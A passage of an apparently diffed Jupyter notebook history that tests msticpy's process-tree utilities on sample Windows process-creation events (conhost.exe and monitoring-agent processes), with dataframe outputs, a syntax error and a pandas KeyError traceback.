\nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \n\n                                                          TimeGenerated_orig_par  \\\nproc_key                                                                           \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.256999936   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 2019-02-09 23:22:56.256999936   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 2019-02-09 23:32:56.260000000   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 2019-02-10 00:02:56.256999936   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 2019-02-10 00:12:56.252999936   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 2019-02-10 00:32:56.270000128   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 2019-02-09 21:32:56.270000128   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 2019-02-09 20:32:56.260000000   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 2019-02-09 22:02:56.263000064   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 2019-02-09 22:32:56.247000064   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 2019-02-09 22:32:56.260000000   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 2019-02-09 20:52:56.260000000   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  False   True    False   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  False   True    False   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  False   True    False   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  False   True    False   \n\n                                                            path parent_index  \nproc_key                                                                       \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...    1004/10/11           10  \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  1004/107/108          107  \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  1004/120/121          120  \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  1004/127/128          127  \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  1004/129/130          129  \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  1004/139/140          139  \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...    1004/15/16           15  \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...      1004/5/6            5  \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...    1004/67/68           67  \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...    1004/76/77           76  \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...    1004/78/79           78  \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...      1004/8/9            8  \n\n[12 rows x 35 columns]"
+       },
+       "execution_count": 14,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "depth = full_tree[\"path\"].str.count(\"/\").max() + 1\nfull_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1]"
+    },
+    "executionTime": "2019-12-13T20:44:21.327Z"
+   },
+   {
+    "cell": {
+     "executionCount": 15,
+     "executionEventId": "7483fa17-ca0b-4a03-93a4-db1ae7ac1659",
+     "hasError": true,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "ename": "SyntaxError",
+       "evalue": "invalid syntax (<ipython-input-15-301955dbc649>, line 6)",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;36m  File \u001b[1;32m\"<ipython-input-15-301955dbc649>\"\u001b[1;36m, line \u001b[1;32m6\u001b[0m\n\u001b[1;33m    assert len(children) = 13\u001b[0m\n\u001b[1;37m                         ^\u001b[0m\n\u001b[1;31mSyntaxError\u001b[0m\u001b[1;31m:\u001b[0m invalid syntax\n"
+       ]
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) = 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nptutil.get_ancestors(p_tree, bottom_desc)\n# ptutil.get_parent\n# ptutil.get_process\n# ptutil.build_process_key\n# ptutil.infer_schema\n# ptutil.get_root\n# ptutil.get_root_tree\n# ptutil.get_siblings\n# ptutil.get_summary_info"
+    },
+    "executionTime": "2019-12-13T20:46:04.028Z"
+   },
+   {
+    "cell": {
+     "executionCount": 16,
+     "executionEventId": "df326a6a-0280-44ee-bb8d-38dafffd51a5",
+     "hasError": false,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>NaN</td>\n      <td>4688</td>\n      <td>1970-01-01 00:00:00.000</td>\n      <td>MSTICAlertsWin1</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>0x3e7</td>\n      <td>0x864</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaT</td>\n      <td>NaN</td>\n      <td>True</td>\n      <td>False</td>\n      <td>False</td>\n      <td>1004</td>\n      <td>NaN</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x8dc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/10</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.273</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x183c</td>\n      <td>...</td>\n      <td>998.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 21:02:56.256999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/10/11</td>\n      <td>10</td>\n    </tr>\n  </tbody>\n</table>\n<p>3 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\program files\\microsoft monitoring agent\\age...                         NaN   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.273   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...            NaN   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...               NaN   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...               NaN   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x864  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x8dc  ...   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...       0x183c  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...            998.0   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...         0x864   \n\n                                                                                   NewProcessName_par  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \n\n                                                          TimeGenerated_orig_par  \\\nproc_key                                                                           \nc:\\program files\\microsoft monitoring agent\\age...                           NaT   \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.256999936   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...                                                NaN   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...   True  False    False   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  False   True    False   \n\n                                                          path parent_index  \nproc_key                                                                     \nc:\\program files\\microsoft monitoring agent\\age...        1004          NaN  \nc:\\program files\\microsoft monitoring agent\\age...     1004/10         1004  \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  1004/10/11           10  \n\n[3 rows x 35 columns]"
+       },
+       "execution_count": 16,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nptutil.get_ancestors(p_tree, bottom_desc)\n# ptutil.get_parent\n# ptutil.get_process\n# ptutil.build_process_key\n# ptutil.infer_schema\n# ptutil.get_root\n# ptutil.get_root_tree\n# ptutil.get_siblings\n# ptutil.get_summary_info"
+    },
+    "executionTime": "2019-12-13T20:46:10.173Z"
+   },
+   {
+    "cell": {
+     "executionCount": 17,
+     "executionEventId": "d9eb868d-7f9b-4b0d-b219-cbba01689e02",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                               52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount                                          WORKGROUP\\MSTICAlertsWin1$\nEventID                                                                4688\nTimeGenerated                                    2019-02-09 21:02:56.273000\nComputer                                                    MSTICAlertsWin1\nSubjectUserSid                                                     S-1-5-18\nSubjectUserName                                            MSTICAlertsWin1$\nSubjectDomainName                                                 WORKGROUP\nSubjectLogonId                                                        0x3e7\nNewProcessId                                                         0x183c\nNewProcessName                              C:\\Windows\\System32\\conhost.exe\nTokenElevationType                                                   %%1936\nProcessId                                                             0x8dc\nCommandLine               \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...\nParentProcessName         C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId                                                           0x0\nSourceComputerId                       263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc                                   2019-02-09 21:02:56.273000\nEffectiveLogonId                                                      0x3e7\nnew_process_lc                              c:\\windows\\system32\\conhost.exe\nparent_proc_lc            c:\\program files\\microsoft monitoring agent\\ag...\nsource_index                                                             11\nNewProcessId_par                                                      0x8dc\nEffectiveLogonId_par                                                  0x3e7\nnew_process_lc_par        c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par                                                        998\nProcessId_par                                                         0x864\nNewProcessName_par        C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTimeGenerated_orig_par                        2019-02-09 21:02:56.256999936\nparent_key                c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot                                                                False\nIsLeaf                                                                 True\nIsBranch                                                              False\npath                                                             1004/10/11\nparent_index                                                             10\nName: c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000, dtype: object"
+       },
+       "execution_count": 17,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "bottom_desc"
+    },
+    "executionTime": "2019-12-13T20:48:02.822Z"
+   },
+   {
+    "cell": {
+     "executionCount": 18,
+     "executionEventId": "74355753-d7d8-40a0-92cf-1967bc92e8b0",
+     "hasError": true,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "ename": "KeyError",
+       "evalue": "'11'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mKeyError\u001b[0m                                  Traceback (most recent call last)",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexes\\base.py\u001b[0m in \u001b[0;36mget_loc\u001b[1;34m(self, key, method, tolerance)\u001b[0m\n\u001b[0;32m   2896\u001b[0m             \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2897\u001b[1;33m                 \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   2898\u001b[0m             \u001b[1;32mexcept\u001b[0m \u001b[0mKeyError\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;31mKeyError\u001b[0m: '11'",
+        "\nDuring handling of the above exception, another exception occurred:\n",
+        "\u001b[1;31mKeyError\u001b[0m                                  Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-18-fa4831cf43c3>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m\"11\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_process\u001b[1;34m(procs, source)\u001b[0m\n\u001b[0;32m    567\u001b[0m     \"\"\"\n\u001b[0;32m    568\u001b[0m     \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0msource\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mstr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 569\u001b[1;33m         \u001b[1;32mreturn\u001b[0m \u001b[0mprocs\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0msource\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    570\u001b[0m     \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0msource\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mSeries\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    571\u001b[0m         \u001b[1;32mreturn\u001b[0m \u001b[0msource\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexing.py\u001b[0m in \u001b[0;36m__getitem__\u001b[1;34m(self, key)\u001b[0m\n\u001b[0;32m   1422\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1423\u001b[0m             \u001b[0mmaybe_callable\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mapply_if_callable\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mobj\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1424\u001b[1;33m             \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_getitem_axis\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmaybe_callable\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0maxis\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1425\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1426\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m_is_scalar_access\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mkey\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mTuple\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexing.py\u001b[0m in \u001b[0;36m_getitem_axis\u001b[1;34m(self, key, axis)\u001b[0m\n\u001b[0;32m   1848\u001b[0m         \u001b[1;31m# fall thru to straight lookup\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1849\u001b[0m         \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_validate_key\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1850\u001b[1;33m         \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_get_label\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0maxis\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1851\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1852\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexing.py\u001b[0m in \u001b[0;36m_get_label\u001b[1;34m(self, label, axis)\u001b[0m\n\u001b[0;32m    158\u001b[0m             \u001b[1;32mraise\u001b[0m \u001b[0mIndexingError\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m\"no slices here, handle elsewhere\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    159\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 160\u001b[1;33m         \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mobj\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_xs\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mlabel\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0maxis\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    161\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    162\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m_get_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mkey\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mint\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m:\u001b[0m 